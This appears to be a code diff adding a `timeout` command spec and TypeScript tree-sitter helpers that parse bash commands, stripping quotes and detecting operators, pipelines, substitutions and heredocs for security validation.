 * Spec for `timeout`: two positional arguments in order — a required
 * duration, then an argument flagged `isCommand: true`.
 */
const timeout: CommandSpec = {
  name: 'timeout',
  description: 'Run a command with a time limit',
  args: [
    {
      name: 'duration',
      description: 'Duration to wait before timing out (e.g., 10, 5s, 2m)',
      isOptional: false,
    },
    { name: 'command', description: 'Command to run', isCommand: true },
  ],
}
|
||||
|
||||
export default timeout
|
||||
@@ -0,0 +1,506 @@
|
||||
/**
|
||||
* Tree-sitter AST analysis utilities for bash command security validation.
|
||||
*
|
||||
* These functions extract security-relevant information from tree-sitter
|
||||
* parse trees, providing more accurate analysis than regex/shell-quote
|
||||
* parsing. Each function takes a root node and command string, and returns
|
||||
* structured data that can be used by security validators.
|
||||
*
|
||||
* The native NAPI parser returns plain JS objects — no cleanup needed.
|
||||
*/
|
||||
|
||||
/**
 * Minimal structural view of a parse-tree node: only the fields the
 * analysis helpers in this file read.
 */
type TreeSitterNode = {
  /** Grammar node type, e.g. `'string'`, `'list'`, or an operator such as `'&&'`. */
  type: string
  /** Source text of the node. */
  text: string
  /** Start offset of the node; used as the inclusive start of a span. */
  startIndex: number
  /** End offset of the node; used as the exclusive end of a span. */
  endIndex: number
  /** Child nodes; the walkers in this file skip falsy entries. */
  children: TreeSitterNode[]
  /** Number of children. */
  childCount: number
}
|
||||
|
||||
/**
 * Three views of a command string with quoted material stripped to
 * different degrees.
 */
export type QuoteContext = {
  /**
   * Single-quoted content removed; double-quoted content preserved.
   */
  withDoubleQuotes: string
  /**
   * All quoted content removed.
   */
  fullyUnquoted: string
  /**
   * Same as `fullyUnquoted`, except the quote characters themselves
   * (`'`, `"`) are kept.
   */
  unquotedKeepQuoteChars: string
}
|
||||
|
||||
/**
 * Summary of how a command is composed out of smaller commands.
 */
export type CompoundStructure = {
  /**
   * True when at least one compound operator (`&&`, `||`, `;`) was found
   * at the top level.
   */
  hasCompoundOperators: boolean
  /** True when the command contains a pipeline. */
  hasPipeline: boolean
  /** True when the command contains a subshell. */
  hasSubshell: boolean
  /** True when the command contains a command group (`{...}`). */
  hasCommandGroup: boolean
  /** The top-level compound operator types that were found. */
  operators: string[]
  /** The individual command segments separated by compound operators. */
  segments: string[]
}
|
||||
|
||||
/**
 * Flags for shell constructs that security validators care about.
 */
export type DangerousPatterns = {
  /**
   * `$()` or backtick command substitution is present (outside quotes that
   * would make it safe).
   */
  hasCommandSubstitution: boolean
  /** `<()` or `>()` process substitution is present. */
  hasProcessSubstitution: boolean
  /** `${...}` parameter expansion is present. */
  hasParameterExpansion: boolean
  /** A heredoc is present. */
  hasHeredoc: boolean
  /** A comment is present. */
  hasComment: boolean
}
|
||||
|
||||
/**
 * Everything extracted from the parse tree of one command.
 */
export type TreeSitterAnalysis = {
  /** Views of the command with quoted content stripped. */
  quoteContext: QuoteContext
  /** Operators, segments and grouping constructs found. */
  compoundStructure: CompoundStructure
  /**
   * True when real operator nodes (`;`, `&&`, `||`) exist. When false, a
   * `\;` in the command is just a word argument.
   */
  hasActualOperatorNodes: boolean
  /** Presence flags for substitutions, expansions, heredocs and comments. */
  dangerousPatterns: DangerousPatterns
}
|
||||
|
||||
/**
 * `[startIndex, endIndex]` ranges of quoting constructs, bucketed by the
 * node type they were collected from.
 */
type QuoteSpans = {
  /** `raw_string` nodes (single-quoted). */
  raw: [number, number][]
  /** `ansi_c_string` nodes (`$'...'`). */
  ansiC: [number, number][]
  /** `string` nodes (double-quoted). */
  double: [number, number][]
  /** `heredoc_redirect` nodes whose delimiter is quoted. */
  heredoc: [number, number][]
}
|
||||
|
||||
/**
 * Walks the subtree under `node` once and appends the `[startIndex, endIndex]`
 * range of every quoting construct to the matching bucket of `out`.
 *
 * Per node type:
 * - `raw_string` / `ansi_c_string`: recorded, and the walk does not descend.
 *   Their bodies are literal text in bash, so no nested quote nodes exist.
 * - `string`: recorded only when no enclosing `string` has been seen on this
 *   path (`inDouble` is false), so just the outermost double-quoted span is
 *   kept. The walk always descends, because `"$(cmd 'x')"` contains a real
 *   inner `raw_string`.
 * - `heredoc_redirect`: treated as quoted when the text of its first
 *   `heredoc_start` child begins with `'`, `"` or `\`. A quoted heredoc is
 *   recorded and not descended into (literal body). An unquoted one is not
 *   recorded, and the walk continues into it, since its body can contain
 *   `$(cmd 'x')` with genuine quote nodes.
 * - anything else: descend only.
 *
 * @param node     Subtree root to scan.
 * @param out      Accumulator, mutated in place.
 * @param inDouble Whether an ancestor `string` node was already recorded.
 */
function collectQuoteSpans(
  node: TreeSitterNode,
  out: QuoteSpans,
  inDouble: boolean,
): void {
  const kind = node.type

  // Literal-bodied quotes: record and stop.
  if (kind === 'raw_string') {
    out.raw.push([node.startIndex, node.endIndex])
    return
  }
  if (kind === 'ansi_c_string') {
    out.ansiC.push([node.startIndex, node.endIndex])
    return
  }

  let childrenInDouble = inDouble
  if (kind === 'string') {
    if (!inDouble) {
      out.double.push([node.startIndex, node.endIndex])
    }
    // Everything below is inside a double-quoted string from here on.
    childrenInDouble = true
  } else if (kind === 'heredoc_redirect') {
    // Only the first heredoc_start child decides whether the heredoc is quoted.
    const delimiter = node.children.find(
      candidate => candidate && candidate.type === 'heredoc_start',
    )
    const lead = delimiter ? delimiter.text[0] : undefined
    if (lead === "'" || lead === '"' || lead === '\\') {
      out.heredoc.push([node.startIndex, node.endIndex])
      return
    }
    // Unquoted heredoc: fall through and scan its body.
  }

  for (const child of node.children) {
    if (child) collectQuoteSpans(child, out, childrenInDouble)
  }
}
|
||||
|
||||
/**
 * Expands `[start, end)` spans into the set of every individual index they
 * cover. Overlapping spans simply contribute the same indices twice.
 *
 * @param spans Half-open ranges: `start` is included, `end` is not.
 * @returns A new set holding each covered index.
 */
function buildPositionSet(spans: Array<[number, number]>): Set<number> {
  const covered = new Set<number>()
  spans.forEach(([from, to]) => {
    let pos = from
    while (pos < to) {
      covered.add(pos)
      pos++
    }
  })
  return covered
}
|
||||
|
||||
/**
 * Filters out every span that lies inside some other, strictly larger span,
 * so only outermost spans remain. Input order is preserved and the input
 * array is not modified.
 *
 * Nested quotes such as `"$(echo 'hi')"` produce an inner span inside an
 * outer one. Editing the string for both would corrupt indices, because
 * cutting the outer range invalidates the inner range's offsets.
 *
 * Two spans with identical start and end do not contain each other in the
 * strict sense, so both are kept.
 *
 * @param spans Tuples whose first two elements are start and end offsets.
 * @returns A new array with contained spans removed.
 */
function dropContainedSpans<T extends readonly [number, number, ...unknown[]]>(
  spans: T[],
): T[] {
  const outermost: T[] = []
  for (const inner of spans) {
    let swallowed = false
    for (const outer of spans) {
      const encloses = outer[0] <= inner[0] && outer[1] >= inner[1]
      const sameRange = outer[0] === inner[0] && outer[1] === inner[1]
      // A span never swallows itself or an exact duplicate.
      if (encloses && !sameRange) {
        swallowed = true
        break
      }
    }
    if (!swallowed) outermost.push(inner)
  }
  return outermost
}
|
||||
|
||||
/**
 * Returns `command` with the given `[start, end)` character ranges cut out.
 *
 * Spans nested inside a larger span are discarded first. The survivors are
 * cut starting from the highest start index, so earlier offsets stay valid
 * while later parts of the string shrink.
 *
 * @param command Text to cut from.
 * @param spans   Ranges to delete; not modified.
 */
function removeSpans(command: string, spans: Array<[number, number]>): string {
  if (spans.length === 0) return command

  const rightToLeft = dropContainedSpans(spans).sort(
    (left, right) => right[0] - left[0],
  )
  return rightToLeft.reduce(
    (text, [from, to]) => text.slice(0, from) + text.slice(to),
    command,
  )
}
|
||||
|
||||
/**
 * Returns `command` with each span's text replaced by that span's opening
 * and closing delimiter only, i.e. the quoted content is emptied but the
 * quote characters stay.
 *
 * Spans nested inside a larger span are discarded first, and replacements
 * run from the highest start index down so that earlier offsets stay valid.
 *
 * @param command Text to rewrite.
 * @param spans   `[start, end, open, close]` tuples; not modified.
 */
function replaceSpansKeepQuotes(
  command: string,
  spans: Array<[number, number, string, string]>,
): string {
  if (spans.length === 0) return command

  const rightToLeft = dropContainedSpans(spans).sort(
    (left, right) => right[0] - left[0],
  )
  return rightToLeft.reduce(
    (text, [from, to, opener, closer]) =>
      text.slice(0, from) + opener + closer + text.slice(to),
    command,
  )
}
|
||||
|
||||
/**
 * Derives the three quote-stripped views of `command` from its parse tree.
 *
 * Spans come from a single `collectQuoteSpans` walk over these node types:
 * - `raw_string`: single-quoted (`'...'`)
 * - `string`: double-quoted (`"..."`), outermost only
 * - `ansi_c_string`: ANSI-C quoting (`$'...'`); the span includes the `$`
 * - `heredoc_redirect`: quoted heredocs only (`<<'EOF'`, `<<"EOF"`, `<<\EOF`).
 *   The whole redirect span is stripped because its body is literal text.
 *   Unquoted heredocs stay in place, since bash expands `$(...)`/`${...}`
 *   inside them and validators need to see those.
 *
 * Outputs:
 * - `withDoubleQuotes`: single-quoted, ANSI-C and quoted-heredoc spans are
 *   removed. For double-quoted spans only the two delimiter characters are
 *   removed and the content is kept.
 * - `fullyUnquoted`: every collected span is removed.
 * - `unquotedKeepQuoteChars`: every collected span is emptied but its
 *   delimiters are kept (`''`, `$''`, `""`); heredoc spans are removed
 *   entirely.
 *
 * @param rootNode Root of the parse tree; treated as a `TreeSitterNode`.
 * @param command  The source text the tree was parsed from.
 */
export function extractQuoteContext(
  rootNode: unknown,
  command: string,
): QuoteContext {
  const found: QuoteSpans = { raw: [], ansiC: [], double: [], heredoc: [] }
  collectQuoteSpans(rootNode as TreeSitterNode, found, false)
  const { raw, ansiC, double: doubleQuoted, heredoc } = found

  // withDoubleQuotes: one set of indices to skip. It holds every index of the
  // literal-bodied spans, plus the first and last index of each double-quoted
  // span (the `"` characters themselves).
  const omitted = buildPositionSet([...raw, ...ansiC, ...heredoc])
  for (const [open, pastClose] of doubleQuoted) {
    omitted.add(open)
    omitted.add(pastClose - 1)
  }
  const keptChars: string[] = []
  for (let pos = 0; pos < command.length; pos++) {
    if (!omitted.has(pos)) keptChars.push(command.charAt(pos))
  }
  const withDoubleQuotes = keptChars.join('')

  // fullyUnquoted: cut out every span.
  const fullyUnquoted = removeSpans(command, [
    ...raw,
    ...ansiC,
    ...doubleQuoted,
    ...heredoc,
  ])

  // unquotedKeepQuoteChars: pair each span with the delimiters to leave behind.
  const delimited: Array<[number, number, string, string]> = []
  const addAll = (
    ranges: Array<[number, number]>,
    opener: string,
    closer: string,
  ): void => {
    for (const [start, end] of ranges) {
      delimited.push([start, end, opener, closer])
    }
  }
  addAll(raw, "'", "'")
  // The ansi_c_string span includes the leading `$`, so put it back.
  addAll(ansiC, "$'", "'")
  addAll(doubleQuoted, '"', '"')
  // Heredoc redirects have no inline quote characters to preserve.
  addAll(heredoc, '', '')
  const unquotedKeepQuoteChars = replaceSpansKeepQuotes(command, delimited)

  return { withDoubleQuotes, fullyUnquoted, unquotedKeepQuoteChars }
}
|
||||
|
||||
/**
 * Classifies the statement-level structure of a parsed command: which
 * compound operators it uses, whether it contains pipelines, subshells or
 * command groups, and the text of each segment.
 *
 * Each child of the root is handled by node type:
 * - `list`: its `&&` / `||` children are recorded as operators. A nested
 *   `list` or `redirected_statement` member is processed like a root-level
 *   child. Every other member becomes a segment, and a `pipeline`,
 *   `subshell` or `compound_statement` member also sets its flag.
 * - `;`: recorded as an operator.
 * - `pipeline` / `subshell` / `compound_statement`: sets the flag and adds a
 *   segment.
 * - `command` / `declaration_command` / `variable_assignment`: adds a segment.
 * - `redirected_statement`: every child other than `file_redirect` is
 *   processed like a root-level child, so a wrapped list or pipeline is still
 *   detected. If no such child exists, the statement's own text is a segment.
 * - `negated_command` and the control-flow constructs (`if_statement`,
 *   `while_statement`, `for_statement`, `case_statement`,
 *   `function_definition`): the node's text is a segment, and its children
 *   are then processed as well.
 * - any other type is ignored.
 *
 * @param rootNode Root of the parse tree; treated as a `TreeSitterNode`.
 * @param command  Original command text, used as the only segment when the
 *                 walk finds none.
 */
export function extractCompoundStructure(
  rootNode: unknown,
  command: string,
): CompoundStructure {
  const operators: string[] = []
  const segments: string[] = []
  const found = { pipeline: false, subshell: false, commandGroup: false }

  // Flags and records a pipeline / subshell / command-group node.
  // Returns false, touching nothing, for any other node type.
  function noteGrouping(node: TreeSitterNode): boolean {
    if (node.type === 'pipeline') found.pipeline = true
    else if (node.type === 'subshell') found.subshell = true
    else if (node.type === 'compound_statement') found.commandGroup = true
    else return false
    segments.push(node.text)
    return true
  }

  function visitEach(nodes: TreeSitterNode[]): void {
    for (const node of nodes) {
      if (node) visit(node)
    }
  }

  // Handles one direct child of a `list` node.
  function visitListMember(member: TreeSitterNode): void {
    if (member.type === '&&' || member.type === '||') {
      operators.push(member.type)
      return
    }
    if (member.type === 'list' || member.type === 'redirected_statement') {
      // e.g. `cmd1 && cmd2 2>/dev/null && cmd3`: the redirected_statement
      // wraps an inner list whose `&&` must still be counted.
      visit(member)
      return
    }
    if (!noteGrouping(member)) {
      segments.push(member.text)
    }
  }

  // Handles one node as if it were a direct child of the program root.
  function visit(node: TreeSitterNode): void {
    switch (node.type) {
      case 'list':
        for (const member of node.children) {
          if (member) visitListMember(member)
        }
        return
      case ';':
        operators.push(';')
        return
      case 'pipeline':
      case 'subshell':
      case 'compound_statement':
        noteGrouping(node)
        return
      case 'command':
      case 'declaration_command':
      case 'variable_assignment':
        segments.push(node.text)
        return
      case 'redirected_statement': {
        // Redirect targets do not affect compound/pipeline classification.
        const bodies = node.children.filter(
          part => part && part.type !== 'file_redirect',
        )
        if (bodies.length === 0) {
          // Redirect with no body: keep the whole statement as a segment.
          segments.push(node.text)
        } else {
          visitEach(bodies)
        }
        return
      }
      case 'negated_command':
      case 'if_statement':
      case 'while_statement':
      case 'for_statement':
      case 'case_statement':
      case 'function_definition':
        // The construct is itself a segment; its children are still scanned
        // so pipelines, subshells and operators inside it are detected.
        segments.push(node.text)
        visitEach(node.children)
        return
      default:
        return
    }
  }

  visitEach((rootNode as TreeSitterNode).children)

  // Nothing recognised: the whole command is a single segment.
  if (segments.length === 0) {
    segments.push(command)
  }

  return {
    hasCompoundOperators: operators.length > 0,
    hasPipeline: found.pipeline,
    hasSubshell: found.subshell,
    hasCommandGroup: found.commandGroup,
    operators,
    segments,
  }
}
|
||||
|
||||
/**
 * Reports whether the parse tree contains any real compound-operator node.
 *
 * Returns true as soon as a node of type `;`, `&&`, `||` or `list` is found
 * anywhere in the tree. The node's parent is not inspected, so position in
 * the tree does not matter.
 *
 * This is what removes the `find -exec \;` false positive: tree-sitter
 * parses `\;` as part of a `word` node (an argument to find), not as a `;`
 * operator. When this returns false the command has no compound operators
 * and hasBackslashEscapedOperator() can be skipped.
 *
 * @param rootNode Root of the parse tree; treated as a `TreeSitterNode`.
 */
export function hasActualOperatorNodes(rootNode: unknown): boolean {
  const marksCompound = (kind: string): boolean =>
    kind === 'list' || kind === ';' || kind === '&&' || kind === '||'

  // Depth-first search that stops at the first hit.
  const containsOperator = (node: TreeSitterNode): boolean =>
    marksCompound(node.type) ||
    node.children.some(child => Boolean(child) && containsOperator(child))

  return containsOperator(rootNode as TreeSitterNode)
}
|
||||
|
||||
/**
 * Scans the whole parse tree and reports which security-relevant constructs
 * occur anywhere in it.
 *
 * Each flag is true when at least one node of the matching type exists:
 * - `hasCommandSubstitution`: `command_substitution`
 * - `hasProcessSubstitution`: `process_substitution`
 * - `hasParameterExpansion`: `expansion`
 * - `hasHeredoc`: `heredoc_redirect`
 * - `hasComment`: `comment`
 *
 * @param rootNode Root of the parse tree; treated as a `TreeSitterNode`.
 */
export function extractDangerousPatterns(rootNode: unknown): DangerousPatterns {
  // Gather every node type present, then answer each flag by lookup.
  const typesPresent = new Set<string>()
  const pending: TreeSitterNode[] = [rootNode as TreeSitterNode]

  while (pending.length > 0) {
    const node = pending.pop() as TreeSitterNode
    typesPresent.add(node.type)
    for (const child of node.children) {
      if (child) pending.push(child)
    }
  }

  return {
    hasCommandSubstitution: typesPresent.has('command_substitution'),
    hasProcessSubstitution: typesPresent.has('process_substitution'),
    hasParameterExpansion: typesPresent.has('expansion'),
    hasHeredoc: typesPresent.has('heredoc_redirect'),
    hasComment: typesPresent.has('comment'),
  }
}
|
||||
|
||||
/**
 * Runs every extractor in this file over one parse tree and bundles the
 * results.
 *
 * Each extractor walks the tree on its own, so the tree is traversed once
 * per extractor.
 *
 * @param rootNode Root of the parse tree for `command`.
 * @param command  The source text the tree was parsed from.
 * @returns Quote context, compound structure, the operator-node flag and the
 *          dangerous-pattern flags.
 */
export function analyzeCommand(
  rootNode: unknown,
  command: string,
): TreeSitterAnalysis {
  const quoteContext = extractQuoteContext(rootNode, command)
  const compoundStructure = extractCompoundStructure(rootNode, command)
  const operatorNodesPresent = hasActualOperatorNodes(rootNode)
  const dangerousPatterns = extractDangerousPatterns(rootNode)

  return {
    quoteContext,
    compoundStructure,
    hasActualOperatorNodes: operatorNodesPresent,
    dangerousPatterns,
  }
}
|
||||
Reference in New Issue
Block a user